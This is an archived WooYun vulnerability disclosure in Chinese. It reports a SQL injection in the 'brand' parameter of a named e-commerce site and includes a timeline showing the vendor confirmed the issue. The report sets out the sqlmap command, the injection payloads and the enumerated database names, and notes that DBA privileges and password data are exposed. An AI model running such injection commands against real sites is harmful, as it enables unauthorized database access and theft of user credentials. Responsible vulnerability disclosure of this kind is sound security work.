乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-27: 细节已通知厂商并且等待厂商处理中 2015-12-28: 厂商已经确认,细节仅向厂商公开 2016-01-07: 细节向核心白帽子及相关领域专家公开 2016-01-17: 细节向普通白帽子公开 2016-01-27: 细节向实习白帽子公开 2016-02-09: 细节向公众公开
听说爱丽网是乌云发礼物最多的厂商,我就来了
貌似网站挂了。。。。。。注入点:
http://www.wenji99.com/?m=product&s=list&brand=%E6%83%A0%E6%99%AEHP&brand_id=623
python sqlmap.py -u "http://www.wenji99.com/?m=product&s=list&brand=%E6%83%A0%E6%99%AEHP&brand_id=623" --dbs
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n][14:16:40] [INFO] GET parameter 'brand' seems to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable[14:16:40] [INFO] GET parameter 'brand' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable[14:16:57] [INFO] GET parameter 'brand' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectableGET parameter 'brand' is vulnerable. Do you want to keep testing the others (if any)? [y/N]sqlmap identified the following injection point(s) with a total of 850 HTTP(s) requests:---Parameter: brand (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: m=product&s=list&brand=%E6%83%A0%E6%99%AEHP' RLIKE (SELECT (CASE WHEN (1900=1900) THEN 0x2545362538332541302545362539392541454850 ELSE 0x28 END)) AND 'Ppcc'='Ppcc&brand_id=623 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: m=product&s=list&brand=%E6%83%A0%E6%99%AEHP' AND (SELECT 7915 FROM(SELECT COUNT(*),CONCAT(0x716b707a71,(SELECT (ELT(7915=7915,1))),0x716a767171,FLOOR(RAND(0)*2))x FROM INFORMATION_S Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: m=product&s=list&brand=%E6%83%A0%E6%99%AEHP' AND (SELECT * FROM (SELECT(SLEEP(5)))pTQH) AND 'opmk'='opmk&brand_id=623---[14:22:04] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.3.3, Nginxback-end DBMS: MySQL 5.0[14:22:04] [INFO] fetching database names[14:22:12] [INFO] the SQL query used returns 3 entries[14:22:14] [INFO] retrieved: information_schema[14:22:17] [INFO] retrieved: mysql[14:22:18] [INFO] retrieved: wenjiavailable databases [3]:[*] information_schema[*] mysql[*] wenji
数据库 而且是dba
主库 599张表
密码信息
求不忽略
危害等级:高
漏洞Rank:20
确认时间:2015-12-28 14:08
这个站洞洞多的史无前例
暂无